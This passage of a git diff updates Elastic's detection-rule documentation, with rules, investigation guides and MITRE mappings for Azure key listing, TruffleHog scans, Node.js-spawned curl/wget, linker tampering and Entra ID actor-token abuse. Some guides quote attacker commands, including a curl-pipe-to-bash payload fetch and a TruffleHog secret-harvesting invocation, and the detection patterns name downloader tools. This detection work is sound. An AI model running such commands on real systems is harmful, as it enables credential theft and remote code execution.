+- Review and potentially restrict the assignment of high-privilege roles like Owner and Contributor, following the principle of least privilege. +- Enable diagnostic logging for all storage accounts to maintain detailed audit trails of access and operations. +- Consider implementing Privileged Identity Management (PIM) for just-in-time access to high-privilege roles that can list storage keys. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.activitylogs" and +azure.activitylogs.operation_name: "MICROSOFT.STORAGE/STORAGEACCOUNTS/LISTKEYS/ACTION" and +azure.activitylogs.identity.authorization.evidence.principal_type: "User" and +azure.activitylogs.identity.authorization.evidence.role: ( + "Owner" or + "Contributor" or + "Storage Account Contributor" or + "User Access Administrator" +) and event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ +* Sub-technique: +** Name: Cloud Secrets Management Stores +** ID: T1555.006 +** Reference URL: https://attack.mitre.org/techniques/T1555/006/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/credential-access-via-trufflehog-execution.asciidoc b/docs/detections/prebuilt-rules/rule-details/credential-access-via-trufflehog-execution.asciidoc new file mode 100644 index 0000000000..c50938ffb7 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/credential-access-via-trufflehog-execution.asciidoc @@ -0,0 +1,114 @@ +[[credential-access-via-trufflehog-execution]] +=== Credential Access via TruffleHog Execution + +This rule detects the execution of TruffleHog, a tool used to search for high-entropy strings and secrets in code repositories, which may indicate an attempt to access credentials. This tool was abused by the Shai-Hulud worm to search for credentials in code repositories. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: Windows +* OS: macOS +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. 
+ + +*Investigating Credential Access via TruffleHog Execution* + + +This rule flags TruffleHog executed to scan the local filesystem with verified JSON results, a direct path to harvesting secrets from source code, configs, and build artifacts. Attackers gain shell access on a developer workstation or CI runner, clone or point to internal repositories, run 'trufflehog --results=verified --json filesystem .' to enumerate valid tokens, and then pivot using the recovered keys to pull private code or authenticate to cloud and CI/CD systems. + + +*Possible investigation steps* + + +- Review binary path, code signature/hash, parent process chain, initiating user, and host role (developer workstation vs CI runner) to quickly decide if the execution matches an approved secret-scanning job or an ad‑hoc run. +- Determine the working directory and target path used by the scan to identify which repositories or configuration directories were inspected and whether sensitive files (e.g., .env, deployment keys, build secrets) were in scope. +- Pivot to same-session activity to spot credential use or exfiltration by correlating subsequent outbound connections to git remotes or cloud/CI APIs and launches of developer CLIs like git, gh, aws, az, gcloud, docker, kubectl, or vault. +- Look for output artifacts and exfil channels by checking for creation or deletion of JSON reports or archives, clipboard access, or piping of results to curl/wget/netcat and whether those artifacts were emailed or uploaded externally. +- Cross-check VCS and CI/CD audit logs for this identity and host for unusual pushes, pipeline changes, or new tokens issued shortly after the scan, which may indicate worm-like propagation or credential abuse. + + +*False positive analysis* + + +- An approved secret-scanning task by a developer or security engineer runs trufflehog with --results=verified --json filesystem to audit local code and configuration, producing benign activity on a development host. +- An internal automation or scheduled job invokes trufflehog to baseline filesystem secrets for compliance or hygiene checks, leading to expected process-start logs without credential abuse. + + +*Response and remediation* + + +- Immediately isolate the host or CI runner, terminate the trufflehog process and its parent shell/script, and block egress to git remotes and cloud APIs from that asset. +- Collect the verified findings from trufflehog output (stdout or JSON file), revoke and rotate any listed secrets (GitHub personal access tokens, AWS access keys, Azure service principal credentials, CI job tokens), and clear credential caches on the host. +- Remove unauthorized trufflehog binaries/packages, helper scripts, and scheduled tasks; delete report files and scanned working directories (local repo clones, .env/config folders), and purge shell history containing exfil commands like curl/wget/netcat. +- Restore the workstation or runner from a known-good image if tampering is suspected, re-enroll endpoint protection, reissue required developer or CI credentials with least privilege, and validate normal pulls to internal git and cloud services. +- Escalate to full incident response if trufflehog ran under a service account, on a build server/CI runner, or if any discovered secret was used to authenticate to external git remotes (e.g., github.com), cloud APIs, or private registries in the same session. 
+- Harden by blocking unapproved trufflehog execution via application control, moving approved secret scanning to a locked-down pipeline, enforcing short-lived PATs and key rotation, enabling egress filtering from developer hosts/runners, and deploying fleet-wide detections for "trufflehog --results=verified --json filesystem". + + +==== Rule query + + +[source, js] +---------------------------------- +process where event.type == "start" and process.name : ("trufflehog.exe", "trufflehog") and +process.args == "--results=verified" and process.args == "--json" and process.args == "filesystem" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ diff --git a/docs/detections/prebuilt-rules/rule-details/cron-job-created-or-modified.asciidoc b/docs/detections/prebuilt-rules/rule-details/cron-job-created-or-modified.asciidoc index a18ca023fc..a2ca28768f 100644 --- a/docs/detections/prebuilt-rules/rule-details/cron-job-created-or-modified.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/cron-job-created-or-modified.asciidoc @@ -35,7 +35,7 @@ This rule monitors for (ana)cron jobs being created or renamed. Linux cron jobs * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 17 +*Version*: 18 *Rule authors*: @@ -187,13 +187,15 @@ event.action in ("rename", "creation") and file.path : ( "/bin/autossl_check", "/usr/bin/autossl_check", "/proc/self/exe", "/dev/fd/*", "/usr/bin/pamac-daemon", "/bin/pamac-daemon", "/usr/local/bin/dockerd", "/opt/elasticbeanstalk/bin/platform-engine", "/opt/puppetlabs/puppet/bin/ruby", "/usr/libexec/platform-python", "/opt/imunify360/venv/bin/python3", - "/opt/eset/efs/lib/utild", "/usr/sbin/anacron", "/usr/bin/podman", "/kaniko/kaniko-executor" + "/opt/eset/efs/lib/utild", "/usr/sbin/anacron", "/usr/bin/podman", "/kaniko/kaniko-executor", + "/usr/bin/pvedaemon", "./usr/bin/podman", "/usr/lib/systemd/systemd" ) or file.path like ("/var/spool/cron/crontabs/tmp.*", "/etc/cron.d/jumpcloud-updater") or file.extension in ("swp", "swpx", "swx", "dpkg-remove") or file.Ext.original.extension == "dpkg-new" or process.executable : ( - "/nix/store/*", "/var/lib/dpkg/*", "/tmp/vmis.*", "/snap/*", "/dev/fd/*", "/usr/libexec/platform-python*" + "/nix/store/*", "/var/lib/dpkg/*", "/tmp/vmis.*", "/snap/*", "/dev/fd/*", "/usr/libexec/platform-python*", + "/var/lib/waagent/Microsoft*" ) or process.executable == null or process.name in ( @@ -201,7 +203,8 @@ event.action in ("rename", "creation") and file.path : ( "jumpcloud-agent", "crio", "dnf_install", "utild" ) or (process.name == "sed" and file.name : "sed*") or - (process.name == "perl" and file.name : "e2scrub_all.tmp*") + (process.name == "perl" and file.name : "e2scrub_all.tmp*") or + (process.name in ("vi", "vim") and file.name like "*~") ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/curl-or-wget-spawned-via-node-js.asciidoc b/docs/detections/prebuilt-rules/rule-details/curl-or-wget-spawned-via-node-js.asciidoc new file mode 100644 index 0000000000..b82d344140 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/curl-or-wget-spawned-via-node-js.asciidoc @@ -0,0 
+1,153 @@ +[[curl-or-wget-spawned-via-node-js]] +=== Curl or Wget Spawned via Node.js + +This rule detects when Node.js, directly or via a shell, spawns the curl or wget command. This may indicate command and control behavior. Adversaries may use Node.js to download additional tools or payloads onto the system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Curl or Wget Spawned via Node.js* + + +This rule flags Node.js launching curl or wget, directly or via a shell, a common technique to fetch payloads and enable command-and-control. Attackers often abuse child_process in Node apps to run "curl -sL http://host/payload.sh | bash," pulling a second stage from a remote host and executing it immediately under the guise of legitimate application activity. + + +*Possible investigation steps* + + +- Pull the full process tree and command line to extract URLs/domains, flags (e.g., -sL, -O, --insecure), and identify whether the output is piped into an interpreter, indicating immediate execution risk. +- Correlate with file system activity to find newly created or modified artifacts (e.g., in /tmp, /var/tmp, /dev/shm, or the app directory), then hash and scan them and check for follow-on executions. +- Pivot to network telemetry to enumerate connections around the event from both Node.js and the child process, assessing destination reputation (IP/domain, ASN, geo, cert/SNI) against approved update endpoints. +- Trace the initiating Node.js code path and deployment (child_process usage such as exec/spawn/execFile), and review package.json lifecycle scripts and recent npm installs or postinstall hooks for unauthorized download logic. +- Verify user and runtime context (service account/container/pod), inspect environment variables like HTTP(S)_PROXY/NO_PROXY, and check whether credentials or tokens were passed to curl/wget to assess exposure. + + +*False positive analysis* + + +- A legitimate Node.js service executes curl or wget to retrieve configuration files, certificates, or perform health checks against approved endpoints during startup or routine operation. +- Node.js install or maintenance scripts use a shell with -c to run curl or wget and download application assets or updates, triggering the rule even though this aligns with expected deployment workflows. + + +*Response and remediation* + + +- Immediately isolate the affected host or container, stop the Node.js service that invoked curl/wget (and any parent shell), terminate those processes, and block the exact URLs/domains/IPs observed in the command line and active connections. 
+- Quarantine and remove any artifacts dropped by the downloader (e.g., files in /tmp, /var/tmp, /dev/shm or paths specified by -O), delete added cron/systemd entries referencing those files, and revoke API tokens or credentials exposed in the command line or headers. +- Escalate to full incident response if output was piped to an interpreter (curl ... | bash or wget ... | sh), if --insecure/-k or self-signed endpoints were used, if unknown external infrastructure was contacted, or if secrets were accessed or exfiltrated. +- Rebuild and redeploy the workload from a known-good image, remove the malicious child_process code path from the Node.js application, restore validated configs/data, rotate any keys or tokens used by that service, and verify no further curl/wget spawns occur post-recovery. +- Harden by removing curl/wget from runtime images where not required, enforcing egress allowlists for the service, constraining execution with AppArmor/SELinux/seccomp and least-privilege service accounts, and adding CI/CD checks to block package.json postinstall scripts or code that shells out to downloaders. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. 
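+
+One of the investigation steps above suggests reviewing package.json lifecycle scripts and postinstall hooks for unauthorized download logic. The sketch below is a hypothetical triage helper along those lines; the scan root and patterns are illustrative assumptions, not part of this rule:
+
+[source, python]
+----------------------------------
+# Hypothetical triage helper: list npm lifecycle scripts that shell out to
+# curl or wget. The scan root is a placeholder for the application directory
+# identified during the investigation.
+import json
+import re
+from pathlib import Path
+
+LIFECYCLE = {"preinstall", "install", "postinstall", "prepare"}
+DOWNLOADER = re.compile(r"\b(curl|wget)\b")
+
+def suspicious_lifecycle_scripts(root: str):
+    """Yield (package.json path, script name, command) tuples to review."""
+    for pkg in Path(root).rglob("package.json"):
+        try:
+            data = json.loads(pkg.read_text())
+        except (OSError, ValueError):
+            continue
+        scripts = data.get("scripts", {}) if isinstance(data, dict) else {}
+        if not isinstance(scripts, dict):
+            continue
+        for name, command in scripts.items():
+            if name in LIFECYCLE and DOWNLOADER.search(str(command)):
+                yield pkg, name, command
+
+for path, name, command in suspicious_lifecycle_scripts("/srv/app"):  # placeholder root
+    print(f"{path}: {name} -> {command}")
+----------------------------------
+
+Hits are only leads for review, not verdicts; legitimate install scripts also fetch assets with curl or wget, as noted in the false positive analysis above.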
+ + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.parent.name == "node" and ( + ( + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and + process.args == "-c" and process.command_line like~ ("*curl*", "*wget*") + ) or + ( + process.name in ("curl", "wget") + ) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Sub-technique: +** Name: Web Protocols +** ID: T1071.001 +** Reference URL: https://attack.mitre.org/techniques/T1071/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/dynamic-linker-creation-or-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/dynamic-linker-creation-or-modification.asciidoc index 4905f15431..c69a1bd91b 100644 --- a/docs/detections/prebuilt-rules/rule-details/dynamic-linker-creation-or-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/dynamic-linker-creation-or-modification.asciidoc @@ -1,7 +1,7 @@ [[dynamic-linker-creation-or-modification]] === Dynamic Linker Creation or Modification -Detects the creation or modification of files related to the dynamic linker on Linux systems. The dynamic linker is a shared library that is used by the Linux kernel to load and execute programs. Attackers may attempt to hijack the execution flow of a program by modifying the dynamic linker configuration files. +Detects the creation or modification of files related to the configuration of the dynamic linker on Linux systems. The dynamic linker is a shared library that is used by the Linux kernel to load and execute programs. Attackers may attempt to hijack the execution flow of a program by modifying the dynamic linker configuration files. This technique is often observed by userland rootkits that leverage shared objects to maintain persistence on a compromised host. 
*Rule type*: eql @@ -31,7 +31,7 @@ Detects the creation or modification of files related to the dynamic linker on L * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 6 +*Version*: 7 *Rule authors*: @@ -140,22 +140,27 @@ not ( "/bin/pacman", "/usr/bin/pacman", "/usr/bin/dpkg-divert", "/bin/dpkg-divert", "/sbin/apk", "/usr/sbin/apk", "/usr/local/sbin/apk", "/usr/bin/apt", "/usr/sbin/pacman", "/bin/podman", "/usr/bin/podman", "/usr/bin/puppet", "/bin/puppet", "/opt/puppetlabs/puppet/bin/puppet", "/usr/bin/chef-client", "/bin/chef-client", - "/bin/autossl_check", "/usr/bin/autossl_check", "/proc/self/exe", "/dev/fd/*", "/usr/bin/pamac-daemon", + "/bin/autossl_check", "/usr/bin/autossl_check", "/proc/self/exe", "/usr/bin/pamac-daemon", "/bin/pamac-daemon", "/usr/lib/snapd/snapd", "/usr/local/bin/dockerd", "/usr/libexec/platform-python", - "/usr/lib/snapd/snap-update-ns", "/usr/bin/vmware-config-tools.pl" + "/usr/lib/snapd/snap-update-ns", "/usr/bin/vmware-config-tools.pl", "./usr/bin/podman", "/bin/nvidia-cdi-hook", + "/usr/lib/dracut/dracut-install", "./usr/bin/nvidia-cdi-hook", "/.envbuilder/bin/envbuilder", "/usr/bin/buildah", + "/usr/sbin/dnf", "/usr/bin/pamac", "/sbin/pacman", "/usr/bin/crio", "/usr/sbin/yum-cron" ) or file.extension in ("swp", "swpx", "swx", "dpkg-remove") or file.Ext.original.extension == "dpkg-new" or process.executable : ( - "/nix/store/*", "/var/lib/dpkg/*", "/snap/*", "/dev/fd/*", "/usr/lib/virtualbox/*", "/opt/dynatrace/oneagent/*" + "/nix/store/*", "/var/lib/dpkg/*", "/snap/*", "/dev/fd/*", "/usr/lib/virtualbox/*", "/opt/dynatrace/oneagent/*", + "/usr/libexec/platform-python*" ) or process.executable == null or process.name in ( "java", "executor", "ssm-agent-worker", "packagekitd", "crio", "dockerd-entrypoint.sh", - "docker-init", "BootTimeChecker" + "docker-init", "BootTimeChecker", "dockerd (deleted)", "dockerd" ) or (process.name == "sed" and file.name : "sed*") or - (process.name == "perl" and file.name : "e2scrub_all.tmp*") + (process.name == "perl" and file.name : "e2scrub_all.tmp*") or + (process.name == "init" and file.name == "ld.wsl.conf") or + (process.name == "sshd" and file.extension == "dpkg-new") ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/dynamic-linker-ld-so-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/dynamic-linker-ld-so-creation.asciidoc index e618e2f27a..e2b44781e4 100644 --- a/docs/detections/prebuilt-rules/rule-details/dynamic-linker-ld-so-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/dynamic-linker-ld-so-creation.asciidoc @@ -1,7 +1,7 @@ [[dynamic-linker-ld-so-creation]] === Dynamic Linker (ld.so) Creation -This rule detects the creation of the dynamic linker (ld.so) file. The dynamic linker is used to load shared libraries needed by an executable. Attackers may attempt to replace the dynamic linker with a malicious version to execute arbitrary code. +This rule detects the creation of the dynamic linker (ld.so). The dynamic linker is used to load shared libraries needed by an executable. Attackers may attempt to replace the dynamic linker with a malicious version to execute arbitrary code. *Rule type*: eql @@ -11,9 +11,9 @@ This rule detects the creation of the dynamic linker (ld.so) file. The dynamic l * logs-sentinel_one_cloud_funnel.* * endgame-* -*Severity*: low +*Severity*: medium -*Risk score*: 21 +*Risk score*: 47 *Runs every*: 5m @@ -36,7 +36,7 @@ This rule detects the creation of the dynamic linker (ld.so) file. 
The dynamic l * Data Source: Elastic Endgame * Resources: Investigation Guide -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -139,7 +139,18 @@ For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/ ---------------------------------- file where host.os.type == "linux" and event.type == "creation" and process.executable != null and file.path like~ ("/lib/ld-linux*.so*", "/lib64/ld-linux*.so*", "/usr/lib/ld-linux*.so*", "/usr/lib64/ld-linux*.so*") and -not process.name in ("dockerd", "yum", "dnf", "microdnf", "pacman") +not process.executable in ( + "/bin/dpkg", "/usr/bin/dpkg", "/bin/dockerd", "/usr/bin/dockerd", "/usr/sbin/dockerd", "/bin/microdnf", + "/usr/bin/microdnf", "/bin/rpm", "/usr/bin/rpm", "/bin/snapd", "/usr/bin/snapd", "/bin/yum", "/usr/bin/yum", + "/bin/dnf", "/usr/bin/dnf", "/bin/podman", "/usr/bin/podman", "/bin/dnf-automatic", "/usr/bin/dnf-automatic", + "/bin/pacman", "/usr/bin/pacman", "/usr/bin/dpkg-divert", "/bin/dpkg-divert", "/sbin/apk", "/usr/sbin/apk", + "/usr/local/sbin/apk", "/usr/bin/apt", "/usr/sbin/pacman", "/bin/podman", "/usr/bin/podman", "/usr/bin/puppet", + "/bin/puppet", "/opt/puppetlabs/puppet/bin/puppet", "/usr/bin/chef-client", "/bin/chef-client", + "/bin/autossl_check", "/usr/bin/autossl_check", "/proc/self/exe", "/dev/fd/*", "/usr/bin/pamac-daemon", + "/bin/pamac-daemon", "/usr/lib/snapd/snapd", "/usr/local/bin/dockerd", "/usr/libexec/platform-python", + "/usr/lib/snapd/snap-update-ns", "./usr/bin/podman", "/usr/bin/crio", "/usr/bin/buildah", "/bin/dnf5", + "/usr/bin/dnf5", "/usr/bin/pamac" +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/entra-id-actor-token-user-impersonation-abuse.asciidoc b/docs/detections/prebuilt-rules/rule-details/entra-id-actor-token-user-impersonation-abuse.asciidoc new file mode 100644 index 0000000000..7ed41ef4cd --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/entra-id-actor-token-user-impersonation-abuse.asciidoc @@ -0,0 +1,141 @@ +[[entra-id-actor-token-user-impersonation-abuse]] +=== Entra ID Actor Token User Impersonation Abuse + +Identifies potential abuse of actor tokens in Microsoft Entra ID audit logs. Actor tokens are undocumented backend mechanisms used by Microsoft for service-to-service (S2S) operations, allowing services to perform actions on behalf of users. These tokens appear in logs with the service's display name but the impersonated user's UPN. While some legitimate Microsoft operations use actor tokens, unexpected usage may indicate exploitation of CVE-2025-55241, which allowed unauthorized access to Azure AD Graph API across tenants before being patched by Microsoft. 
+ +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 8m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://dirkjanm.io/obtaining-global-admin-in-every-entra-id-tenant-with-actor-tokens/ +* https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-55241 + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Entra ID +* Data Source: Entra Audit Logs +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Privilege Escalation +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Entra ID Actor Token User Impersonation Abuse* + + +This rule detects when Microsoft services use actor tokens to perform operations in audit logs. Actor tokens are undocumented backend mechanisms used by Microsoft for service-to-service (S2S) communication. They appear with a mismatch: the service's display name but the impersonated user's UPN. While some operations legitimately use actor tokens, unexpected usage may indicate exploitation of CVE-2025-55241, which allowed attackers to obtain Global Admin privileges across any Entra ID tenant. Note that this vulnerability has been patched by Microsoft as of September 2025. + + +*Possible investigation steps* + + +- Review the `azure.auditlogs.properties.initiated_by.user.userPrincipalName` field to identify which service principals are exhibiting this behavior. +- Check the `azure.auditlogs.properties.initiated_by.user.displayName` to confirm these are legitimate Microsoft services. +- Analyze the actions performed by these service principals - look for privilege escalations, permission grants, or unusual administrative operations. +- Review the timing and frequency of these events to identify potential attack patterns or automated exploitation. +- Cross-reference with recent administrative changes or service configurations that might explain legitimate use cases. +- Check if any new applications or service principals were registered recently that could be related to this activity. +- Investigate any correlation with other suspicious authentication events or privilege escalation attempts in your tenant. + + +*False positive analysis* + + +- Legitimate Microsoft service migrations or updates may temporarily exhibit this behavior. +- Third-party integrations using Microsoft Graph or other APIs might trigger this pattern during normal operations. +- Automated administrative tools or scripts using service principal authentication could be misconfigured. + + +*Response and remediation* + + +- Immediately review and audit all service principal permissions and recent consent grants in your Entra ID tenant. +- Disable or restrict any suspicious service principals exhibiting this behavior until verified. +- Review and revoke any unnecessary application permissions, especially those with high privileges. +- Enable and review Entra ID audit logs for any permission grants or role assignments made by these service principals. +- Implement Conditional Access policies to restrict service principal authentication from unexpected locations or conditions. +- Enable Entra ID Identity Protection to detect and respond to risky service principal behaviors. 
+- Review and harden application consent policies to prevent unauthorized service principal registrations. +- Consider implementing privileged identity management (PIM) for service principal role assignments. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.auditlogs-* metadata _id, _version, _index +| where azure.auditlogs.properties.initiated_by.user.displayName in ( + "Office 365 Exchange Online", + "Skype for Business Online", + "Dataverse", + "Office 365 SharePoint Online", + "Microsoft Dynamics ERP" + ) and + not azure.auditlogs.operation_name like "*group*" and + azure.auditlogs.operation_name != "Set directory feature on tenant" + and azure.auditlogs.properties.initiated_by.user.userPrincipalName rlike ".+@[A-Za-z0-9.]+\\.[A-Za-z]{2,}" +| keep + _id, + @timestamp, + azure.*, + client.*, + event.*, + source.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ diff --git a/docs/detections/prebuilt-rules/rule-details/entra-id-device-code-auth-with-broker-client.asciidoc b/docs/detections/prebuilt-rules/rule-details/entra-id-device-code-auth-with-broker-client.asciidoc index 774a5efdec..a87714ddd0 100644 --- a/docs/detections/prebuilt-rules/rule-details/entra-id-device-code-auth-with-broker-client.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/entra-id-device-code-auth-with-broker-client.asciidoc @@ -33,10 +33,10 @@ Identifies device code authentication with an Azure broker client for Entra ID. * Data Source: Azure * Data Source: Microsoft Entra ID * Use Case: Identity and Access Audit -* Tactic: Credential Access +* Tactic: Initial Access * Resources: Investigation Guide -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -117,10 +117,34 @@ This rule optionally requires Azure Sign-In logs from the Azure integration. 
Ens *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Credential Access -** ID: TA0006 -** Reference URL: https://attack.mitre.org/tactics/TA0006/ +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ * Technique: -** Name: Steal Application Access Token -** ID: T1528 -** Reference URL: https://attack.mitre.org/techniques/T1528/ +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ +* Sub-technique: +** Name: Application Access Token +** ID: T1550.001 +** Reference URL: https://attack.mitre.org/techniques/T1550/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/entra-id-global-administrator-role-assigned.asciidoc b/docs/detections/prebuilt-rules/rule-details/entra-id-global-administrator-role-assigned.asciidoc new file mode 100644 index 0000000000..dc582c5dbc --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/entra-id-global-administrator-role-assigned.asciidoc @@ -0,0 +1,122 @@ +[[entra-id-global-administrator-role-assigned]] +=== Entra ID Global Administrator Role Assigned + +In Microsoft Entra ID, permissions to manage resources are assigned using roles. The Global Administrator is a role that enables users to have access to all administrative features in Microsoft Entra ID and services that use Microsoft Entra ID identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Attackers can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources. They can also elevate privilege to User Access Administrator to pivot into Azure resources. 
